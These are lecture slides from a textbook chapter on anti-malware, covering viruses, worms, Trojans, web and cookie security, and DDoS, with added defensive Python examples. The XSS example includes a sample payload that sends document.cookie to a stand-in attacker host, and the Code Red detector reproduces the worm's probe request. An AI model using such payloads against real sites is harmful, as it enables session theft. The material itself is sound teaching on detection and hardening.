J. Wang. Computer Network Security Theory and Practice. Springer 2008 Chapter 8 The Art of Anti Malicious Software
Page 1: Chapter 8


Chapter 8

The Art of Anti Malicious Software

Page 2: Chapter 8


Chapter 8 Outline

8.1 Viruses
8.2 Worms
8.3 Virus Defense
8.4 Trojan Horses
8.5 Hoaxes
8.6 Peer-to-Peer Security
8.7 Web Security
8.8 Distributed Denial of Service Attacks

Page 3: Chapter 8


Viruses

A computer virus is a piece of code hiding in a program that can automatically copy itself, or embed a mutation of itself, into other programs
- Cannot spread on its own; requires a host program to live in
- Infected program: a host program that carries a virus
- Uninfected program (healthy program): a program that contains no virus
- Disinfected program: a program that was once infected but has since been cleared of viruses

Viruses are specific to particular types of file systems, file formats and operating systems, and to particular types of architecture, CPU, languages, macros, scripts, debuggers, and every other form of programming or system environment

Page 4: Chapter 8


Virus Types

Classified based on host programs:
- Boot virus:
  - Infects the boot program in the boot sector
  - Uses the boot sequence to activate itself
  - Modifies the operating system to intercept disk access and infect other disks
  - May also infect an updatable BIOS of a PC
- File-system virus:
  - The file system maintains a table of pointers to the first cluster of each file
  - Overwrites table entries and spreads itself through the file system
- File-format virus: infects individual files
- Macro virus: infects documents containing macro code

Page 5: Chapter 8


Virus Types (cont.)

- Script virus: infects script files; replicates itself in the form of email attachments, office documents and Web documents
- Registry virus: infects the Microsoft Windows registry
- Memory-resident virus: infects programs loaded into main memory for execution

Classified based on embedded forms:
- Stealth virus: masks its presence, usually by using compression so that the infected host does not appear to change
- Polymorphic virus: may change instruction orderings or encrypt itself, so that each copy takes a different form while the decryption stub stays recognizable
- Metamorphic virus: rewrites its own code automatically each time it propagates, so no fixed byte sequence survives from one copy to the next

Page 6: Chapter 8


Virus Infection Schemes

- Overwrite a segment of an existing program
- Insert itself at the beginning, in the middle, or at the end of an uninfected host program
- Break itself into segments and insert each segment at a different location in the host program
- A virus has the same access rights as its host program

Page 7: Chapter 8


Virus Infection Schemes (Diagram)

Page 8: Chapter 8


Virus Structure

Consists of 4 main subroutines:
- Infect: search for host programs, check whether each is already infected, and infect those that are not
- Infection-Condition: check for certain conditions before launching the Infect subroutine
- Break-Out: carry out the actual damage (the payload)
- Breakout-Condition: check for certain conditions (for example a date, or a count of infections) before launching the Break-Out subroutine

Page 9: Chapter 8


Compressor Viruses

- An infected host file will often show a change in size between before and after infection
- Compressor viruses attempt to hide that change:
  - Compress the host file during infection
  - Decompress the host file when it is run (the breakout period), so the host still works
  - May add padding if the compressed host plus the viral code is smaller than the original size
- This defeats a scanner that only compares file sizes; an integrity check value computed over the file contents still detects the change

Page 10: Chapter 8


Virus Dissemination

- Traditional: spread through portable storage devices such as floppy disks, CDs and flash memory sticks
- Contemporary: spread through email attachments and downloaded programs
  - Email is a significant vector because many email programs and users blindly open attachments

Page 11: Chapter 8


Win32 Virus Infection Dissection

Win32 viruses exploit Microsoft's Portable Executable (PE) format for infection

A PE file contains:
- PE headers: provide crucial information about the executable image (for example the entry point address and the section table); natural targets of Win32 viruses
- PE sections: modules of code, data, resources, import tables, and export tables
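The header fields a Win32 infector has to rewrite (the entry point and the section table) are the same fields a scanner inspects first. The following is an added example, not code from the textbook: a minimal PE32 header walk plus the two classic header heuristics (entry point moved into the last section, entry section both writable and executable). The images it parses are constructed header-only byte blobs built by build_image; they are not executables, and the section names and flag values are chosen for the demo.

```python
import struct

# Constants from the PE specification (winnt.h names).
IMAGE_DOS_SIGNATURE = 0x5A4D        # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550     # "PE\0\0"
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table (PE32)."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # file offset of "PE\0\0"
    if e_lfanew + 44 > len(data) or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature")
    # COFF file header (20 bytes) follows the 4-byte signature.
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if struct.unpack_from("<H", data, opt_off)[0] != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise ValueError("only PE32 images are handled in this example")
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]  # AddressOfEntryPoint
    sec_off = opt_off + opt_size
    if sec_off + 40 * nsections > len(data):
        raise ValueError("section table runs past end of image")
    sections = []
    for i in range(nsections):
        (name, vsize, vaddr, rawsize, rawptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", data, sec_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "rawptr": rawptr,
                         "rawsize": rawsize, "chars": chars})
    return {"entry_rva": entry_rva, "sections": sections}


def infection_indicators(pe: dict) -> list:
    """Header heuristics an AV engine uses to flag a possibly infected PE (indicators, not proof)."""
    secs, entry = pe["sections"], pe["entry_rva"]
    holder = next((s for s in secs
                   if s["vaddr"] <= entry < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    if holder is None:
        return ["entry point lies outside every section"]
    findings = []
    if len(secs) > 1 and holder is secs[-1]:
        findings.append(f"entry point in last section {holder['name']!r} (appending infector pattern)")
    if holder["chars"] & IMAGE_SCN_MEM_WRITE and holder["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section {holder['name']!r} is both writable and executable")
    return findings


def build_image(entry_rva: int, sections: list) -> bytes:
    """Construct a PE32 header-only image (DOS stub, PE signature, COFF + optional header, section table)."""
    e_lfanew = 0x40
    dos = struct.pack("<H", IMAGE_DOS_SIGNATURE).ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    opt = (struct.pack("<H", IMAGE_NT_OPTIONAL_HDR32_MAGIC).ljust(16, b"\0")
           + struct.pack("<I", entry_rva)).ljust(224, b"\0")    # 224 = PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, rawptr, rawsize, chars in sections)
    return dos + struct.pack("<I", IMAGE_NT_SIGNATURE) + coff + opt + table


# Constructed sample images (headers only, never executable): a clean two-section layout, and one
# shaped like a classic appending infector that adds a writable+executable last section and
# points the entry point at it. Tuple order: (name, vaddr, vsize, rawptr, rawsize, characteristics).
TEXT = (".text", 0x1000, 0x800, 0x400, 0x800, 0x60000020)     # CODE | EXECUTE | READ
DATA = (".data", 0x2000, 0x200, 0xC00, 0x200, 0xC0000040)     # INITIALIZED_DATA | READ | WRITE
CLEAN_IMAGE = build_image(0x1000, [TEXT, DATA])
INFECTED_IMAGE = build_image(0x3000, [TEXT, DATA, (".vir", 0x3000, 0x400, 0xE00, 0x400, 0xE0000020)])

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_IMAGE), ("infected", INFECTED_IMAGE)):
        print(label, infection_indicators(parse_pe(img)))
```

Both heuristics fire on the constructed infected image and neither on the clean one; in practice packers and some linkers produce the same header shapes, which is why these are indicators that feed a heuristic scanner rather than verdicts on their own.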


Page 13: Chapter 8


Worms

A worm is a standalone program that can replicate itself and spread through networks
- May be viewed as a network virus
- Can execute itself automatically on a remote host
- May still need a host file for spreading

Most worms consist of:
- Target locator subroutine: find new targets
- Infection propagator subroutine: transfer itself to a new computer

Page 14: Chapter 8


Common Worm Types

- Mass mailers
  - Anti-virus vendors usually attach "@mm" after the worm's name
  - Reproduce themselves through email attachments
- Rabbits
  - Rapidly replicate themselves until the system crashes due to the resource load
  - Often hidden in a file directory or disguised with normal file names

Page 15: Chapter 8


Worm Examples

- Morris worm (1988)
  - Exploited implementation flaws in sendmail, finger and rsh/rexec
  - Used them to infect other computers as quickly as possible (AQAP)
- Melissa worm (1999)
  - A macro virus targeted at Microsoft products (Word documents)
  - Spread via email attachments
  - Spread fast, creating a huge amount of email traffic

Page 16: Chapter 8


Email Attachments

Email attachments can be classified (roughly) into 3 categories:
- Safe: non-executable, no macros
- To-be-cautious: contain macros or executable code; whether to open them depends on the sender
- Perilous: should not be opened at all

Page 17: Chapter 8


The Code Red Worm

- Released in July 2001, it infected about 300K computers within the first 24 hours of its release
- It exploited a buffer overflow in Microsoft's IIS (in the Indexing Service ISAPI extension that handles .ida requests; Microsoft bulletin MS01-033)
- It arrived as a GET /default.ida request whose query string held 224 N's followed by the exploit payload
- Processing this request overflows the buffer and starts the worm code executing on the server
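Because the probe has a fixed shape (a request for /default.ida followed by a long run of one filler character), it is easy to recognise in a Web server's request log. The following is an added example, not code from the textbook: a classifier for HTTP request lines that flags the Code Red shape and, more generally, any request for the .ida/.idq Indexing Service extension, which a hardened IIS host has unmapped. The request lines are constructed for the demo, the payload after the N's is abbreviated, and the filler-run threshold of 200 is an assumption chosen to sit just below the 224 in the text.

```python
import re

# Code Red's probe (from the text): GET /default.ida? followed by 224 N's and then the exploit payload.
# A run of one repeated filler character of that length in an .ida query is the signature; matching any
# repeated character, not just N, also catches variants that used a different filler byte.
CODE_RED_RE = re.compile(rb"^GET /default\.ida\?(.)\1{199,}", re.IGNORECASE)
# Any request for the .ida/.idq Indexing Service extension: with the script mapping removed from IIS,
# such requests have no legitimate purpose and are worth alerting on by themselves.
ISAPI_IDX_RE = re.compile(rb"^(?:GET|POST|HEAD) /[^ ]*\.(?:ida|idq)(?:\?|\s)", re.IGNORECASE)


def classify_request(request_line: bytes) -> str:
    """Return a verdict for one HTTP request line."""
    if CODE_RED_RE.match(request_line):
        return "code-red-probe"
    if ISAPI_IDX_RE.match(request_line):
        return "indexing-isapi-request"
    return "benign"


def scan_request_log(lines) -> dict:
    """Count verdicts over a sequence of HTTP request lines (e.g. read from an access log)."""
    counts = {"code-red-probe": 0, "indexing-isapi-request": 0, "benign": 0}
    for line in lines:
        counts[classify_request(line.strip())] += 1
    return counts


# Constructed request lines (not captured traffic); the payload after the filler is abbreviated.
SAMPLE_REQUESTS = [
    b"GET /index.html HTTP/1.0",
    b"GET /default.ida?" + b"N" * 224 + b"%u9090%u6858 HTTP/1.0",
    b"GET /search.idq?q=hello HTTP/1.1",
    b"GET /default.ida?" + b"X" * 224 + b"%u9090 HTTP/1.0",   # same shape, different filler byte
    b"POST /login.asp HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify_request(line), line[:40])
    print(scan_request_log(SAMPLE_REQUESTS))
```

Detection is the second line of defence here: the first is removing the .ida/.idq script mapping and applying the vendor patch, after which the request is rejected before any buffer is touched.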


Page 19: Chapter 8


Virus Defense

Prevention: block viruses from getting into a healthy system
- Install software patches in time
- Do not download software from untrusted Web sites
- Do not open "to-be-cautious" email attachments from unknown senders
- Do not open perilous email attachments

Restoration: disinfect infected systems
- Scan files with a virus scanner
- Keep a backup of system and user files

Page 20: Chapter 8


Standard Scanning Methods

- Basic scanning: search for signatures of known viruses in files that can host a virus; check the size of system files
- Heuristic scanning: search for suspicious code fragments in executable files
- ICV scanning: compute an integrity check value (ICV) for each uninfected executable file, then check the file against that value later on
- Behavior monitoring: evaluate the behavior of executing programs
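The following is an added example, not code from the textbook, that shows signature scanning and ICV scanning side by side on an in-memory set of files, and uses the compressor-virus slide above as the test case: the simulated infection keeps the host's size unchanged, so the size check passes while the ICV check fails. The file contents, the signature marker and the ICV key are all constructed for the demo; the ICV is a keyed hash (HMAC-SHA256) on the assumption that the key is stored where malware on the scanned host cannot read it.

```python
import hashlib
import hmac
import zlib

# Constructed signature database: byte patterns that identify known malware.
# Real engines hold many thousands of such patterns with wildcards; this marker is invented for the demo.
SIGNATURES = {"Demo.Compressor": b"DEMO-COMPRESSOR-VIRUS-MARKER"}

# Constructed known-clean 'file system': name -> contents.
CLEAN_FILES = {
    "calc.exe": b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\xcc" * 400,
    "notes.txt": b"meeting at 10am\n",
}

# The ICV key must not be readable by malware on the monitored host (keep it on read-only media or on
# a separate machine); otherwise a virus can simply recompute matching ICVs. Constructed here.
ICV_KEY = b"icv-key-kept-off-the-monitored-host"


def signature_scan(content: bytes) -> list:
    """Basic scanning: report every known signature that occurs anywhere in the file."""
    return [name for name, pattern in SIGNATURES.items() if pattern in content]


def compute_icv(content: bytes, key: bytes) -> str:
    """Integrity check value: HMAC-SHA256 over the whole file, keyed so it cannot be forged."""
    return hmac.new(key, content, hashlib.sha256).hexdigest()


def build_baseline(files: dict, key: bytes) -> dict:
    """Record (size, ICV) for every file while the system is known to be clean."""
    return {name: (len(data), compute_icv(data, key)) for name, data in files.items()}


def icv_scan(files: dict, baseline: dict, key: bytes) -> dict:
    """Compare each file's size and ICV against the baseline; return only the files that differ."""
    report = {}
    for name, data in files.items():
        if name not in baseline:
            report[name] = "new file, no baseline"
            continue
        size0, icv0 = baseline[name]
        if len(data) != size0:
            report[name] = "size changed"
        elif not hmac.compare_digest(compute_icv(data, key), icv0):
            report[name] = "size unchanged, ICV mismatch"   # exactly what a size-only check misses
    return report


def simulate_compressor_infection(host: bytes, viral_code: bytes) -> bytes:
    """Model of a compressor virus: compress the host, prepend the viral code, pad to the original size."""
    body = viral_code + zlib.compress(host, 9)
    if len(body) > len(host):
        raise ValueError("host too small to hide the viral code")  # such a virus skips this host
    return body + b"\x00" * (len(host) - len(body))


def demo() -> tuple:
    """Infect calc.exe, then run both scans; returns (ICV report, signature hits on calc.exe)."""
    baseline = build_baseline(CLEAN_FILES, ICV_KEY)
    current = dict(CLEAN_FILES)
    current["calc.exe"] = simulate_compressor_infection(CLEAN_FILES["calc.exe"], SIGNATURES["Demo.Compressor"])
    return icv_scan(current, baseline, ICV_KEY), signature_scan(current["calc.exe"])


if __name__ == "__main__":
    print(demo())
```

The signature scan catches this sample only because its marker is already in the database; a new or polymorphic variant would pass it, while the ICV scan still reports the file because any change to the bytes changes the value, which is why the two methods are used together.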

Page 21: Chapter 8


Some Common Anti-Virus Software Products

- McAfee VirusScan: http://www.mcafee.com
- Norton AntiVirus: http://www.symantec.com
- Avast! AntiVirus: http://www.avast.com
- AVG: http://www.grisoft.com

Page 22: Chapter 8


Virus Emulator

- An isolated hardware and software environment (a sandbox) in which suspicious programs are run and their behavior evaluated
- May create a large amount of computational overhead
- Helps to prevent suspicious programs from causing damage to critical systems


Page 24: Chapter 8


Trojan Horses

A program that appears to have some useful function but contains a malicious payload (a.k.a. warrior code)
- Cannot replicate itself automatically
- Requires direct user intervention to run

May inflict the following types of damage:
- Install a backdoor or zombieware for DDoS attacks
- Install spyware
- Look for users' bank account numbers and other private information
- Install viruses or other malicious code on other hosts
- Modify or delete user files


Page 26: Chapter 8


Hoaxes

Hoaxes trick users into doing something they would normally not do
- Often in the form of email messages
- Example: the "You've Got Virus!" hoax
- The countermeasure to hoaxes is to ignore them
- There is no free lunch!


Page 28: Chapter 8


Peer-to-Peer Security

- Client-server topology: a small number of servers provide services to a large number of clients
- P2P topology: an ad hoc network in which each computer acts both as a client and as a server

Page 29: Chapter 8


Peer-to-Peer Security (cont.)

Security vulnerabilities:
- Copyright infringement
- Consumes too much bandwidth and local disk storage
- DoS attacks
- A P2P application opens a specific port to share files with unknown users, which may open a door for Trojan horses, viruses and other malicious software

Security measures:
- Install only official P2P software
- Scan a downloaded file before opening it
- Disallow P2P software in the company


Page 31: Chapter 8


Web Security

Basic types of Web documents:
- Static documents: a Web document without executable code; safe to download
- Dynamic documents: a Web document containing executable code (for example a CGI program) that is executed on the server computer; only the resulting document is downloaded to the client
- Active documents: also contain executable code, but the code runs on the client computer; the entire document is downloaded to the client for execution

Page 32: Chapter 8


Security of Web Documents

Server side: may be attacked by exploiting loopholes in dynamic documents and Web server programs
- Security measures:
  - Update to the newest version of the Web server programs
  - Manage CGI programs and their directories rigorously
  - Only a designated person can post CGI programs on the Web server

Client side: may be attacked by exploiting loopholes in active documents and Web browser programs
- Security measures:
  - Install browser patches
  - Disable JavaScript in the browser
  - Disable Java applets in the browser

Page 33: Chapter 8


Cookies

- HTTP is stateless: the browser opens a new connection to the Web server for each URL request, so subsequent pages arrive over different, unrelated TCP connections
- A cookie stores user information; the server sets it and passes it to the user's browser
- The browser sends the cookie back along with the user's requests for subsequent pages
- Server: must ensure cookies cannot be used for malicious purposes, since the client controls what it sends back (for example, sign the cookie so its contents cannot be forged, give it an expiry, and mark it HttpOnly and Secure)
- Client: remove stored cookies frequently
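The server-side half of that rule is the part that needs code: since the browser returns whatever value it was given, a cookie that carries state must be authenticated before it is trusted. The following is an added example, not code from the textbook: a session cookie whose payload is signed with HMAC-SHA256 and given an expiry, a verifier that rejects tampered or expired cookies in constant time, and the Set-Cookie attributes that keep the cookie away from scripts and plain HTTP. The secret, the session fields and the timestamps are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed server-side secret; a real deployment loads it from a secrets store and never ships it to clients.
COOKIE_SECRET = b"server-side-cookie-secret"


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _mac(payload: str) -> str:
    return _b64(hmac.new(COOKIE_SECRET, payload.encode("ascii"), hashlib.sha256).digest())


def make_session_cookie(session: dict, ttl_seconds: int, now: int = None) -> str:
    """Serialize the session with an expiry and append an HMAC so the client cannot alter it unnoticed."""
    now = int(time.time()) if now is None else now
    payload = _b64(json.dumps({**session, "exp": now + ttl_seconds}, separators=(",", ":")).encode())
    return f"{payload}.{_mac(payload)}"


def verify_session_cookie(cookie: str, now: int = None):
    """Return the session dict if the cookie is authentic and unexpired, otherwise None."""
    payload, sep, mac = cookie.partition(".")
    # Constant-time comparison so a forger learns nothing from response timing.
    if not sep or not hmac.compare_digest(mac.encode(), _mac(payload).encode()):
        return None
    try:
        session = json.loads(_unb64(payload))
    except (ValueError, UnicodeDecodeError):
        return None
    now = int(time.time()) if now is None else now
    if not isinstance(session, dict) or session.get("exp", 0) <= now:
        return None
    return session


def set_cookie_header(name: str, value: str) -> str:
    """HttpOnly keeps the cookie out of document.cookie, Secure keeps it off plain HTTP,
    SameSite keeps it out of most cross-site requests."""
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


def demo() -> dict:
    cookie = make_session_cookie({"uid": 42, "role": "user"}, ttl_seconds=3600, now=1_000)
    _payload, _, mac = cookie.partition(".")
    # The client rewrites its role to admin but cannot produce a matching MAC without the secret.
    forged_payload = _b64(json.dumps({"uid": 42, "role": "admin", "exp": 4_600}, separators=(",", ":")).encode())
    return {
        "header": set_cookie_header("sid", cookie),
        "valid": verify_session_cookie(cookie, now=2_000),
        "forged": verify_session_cookie(f"{forged_payload}.{mac}", now=2_000),
        "expired": verify_session_cookie(cookie, now=5_000),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Signing keeps the contents honest but not secret (the payload is only base64), so anything confidential belongs in server-side storage referenced by an opaque session identifier rather than in the cookie itself.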

Page 34: Chapter 8


Spyware

Malicious software installed, often as a plugin module in the Web browser, without the user's consent

Spyware may:
- Collect the user's information and send it to the attacker
- Monitor the user's Web surfing activities and pop up ads
- Modify the default settings of the browser and redirect to a certain Web page

Countermeasures against spyware:
- Set up a firewall to prevent attackers from embedding spyware
- Install software patches in time
- Install anti-spyware software

Page 35: Chapter 8


AJAX Security

- Asynchronous JavaScript and XML (AJAX)
- AJAX achieves asynchronous interactions with the server to make surfing smooth
- Example: Google Maps
- AJAX applications face the same security problems as traditional Web applications:
  - Cross-site scripting attacks
  - Silent calls (requests the user never sees) and the cookies sent along with them
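Of the problems listed, cross-site scripting is the one with a concrete server-side fix: encode user-controlled data before it is placed in HTML, and have AJAX endpoints return typed JSON rather than HTML fragments built by concatenation. The following is an added example, not code from the textbook, showing a vulnerable renderer next to its hardened form and the same pair for an AJAX response. The attacker input is constructed, the hostname attacker.example is a placeholder, and the response functions return (headers, body) tuples rather than running a real server.

```python
import html
import json

# Constructed attacker input: what a user could type into a profile field or pass as an AJAX parameter.
XSS_PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'


def render_unsafe(username: str) -> str:
    """Vulnerable: user input is concatenated straight into HTML, so markup in it executes."""
    return f"<p>Welcome, {username}!</p>"


def render_safe(username: str) -> str:
    """Hardened: HTML-encode user input before it is placed in element content; quote=True also
    covers attribute values, so the same function is safe inside a quoted attribute."""
    return f"<p>Welcome, {html.escape(username, quote=True)}!</p>"


def ajax_response_unsafe(data: dict) -> tuple:
    """Vulnerable: an AJAX endpoint that returns an HTML fragment the page drops into innerHTML."""
    return {"Content-Type": "text/html; charset=utf-8"}, f"<div class=\"name\">{data['name']}</div>"


def ajax_response_safe(data: dict) -> tuple:
    """Hardened: return JSON with an explicit type and nosniff, and leave rendering to client code
    that assigns textContent instead of innerHTML. JSON-encoding '<' stops a browser that is tricked
    into treating the body as HTML from seeing a tag."""
    headers = {"Content-Type": "application/json; charset=utf-8", "X-Content-Type-Options": "nosniff"}
    body = json.dumps(data).replace("<", "\\u003c").replace(">", "\\u003e")
    return headers, body


def demo() -> dict:
    return {
        "unsafe_html": render_unsafe(XSS_PAYLOAD),
        "safe_html": render_safe(XSS_PAYLOAD),
        "unsafe_ajax": ajax_response_unsafe({"name": XSS_PAYLOAD}),
        "safe_ajax": ajax_response_safe({"name": XSS_PAYLOAD}),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The escaped output still displays the attacker's text verbatim to the user; it just no longer parses as markup, which is the whole point of output encoding.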

Page 36: Chapter 8


Safe Web Surfing

- Download software only from trusted Web sites
- Do not click any button on a popup window
- Read privacy statements, license statements and security warnings to find out the risks you take if you install and run the software
- Do not visit other sites with addresses different from the password-protected site you are logged into
- Do not visit suspicious Web sites


Page 38: Chapter 8


Master-Slave DDoS Attack (Diagram)

Page 39: Chapter 8


Master-Slave-Reflector DDoS Attack (Diagram)

Page 40: Chapter 8


DDoS Attack Countermeasures

Reduce the number of vulnerable computers:
- Improve security management of networked computers
- Set up a backup system
- Distribute resources appropriately
- Construct a DDoS monitoring and responding system
- Keep a complete system log to help trace sources

Make it hard for attackers to find vulnerable computers:
- Close all unnecessary ports to defy port scans
- Disconnect the network connection when the user's computer is no longer in use
- Detect and remove zombieware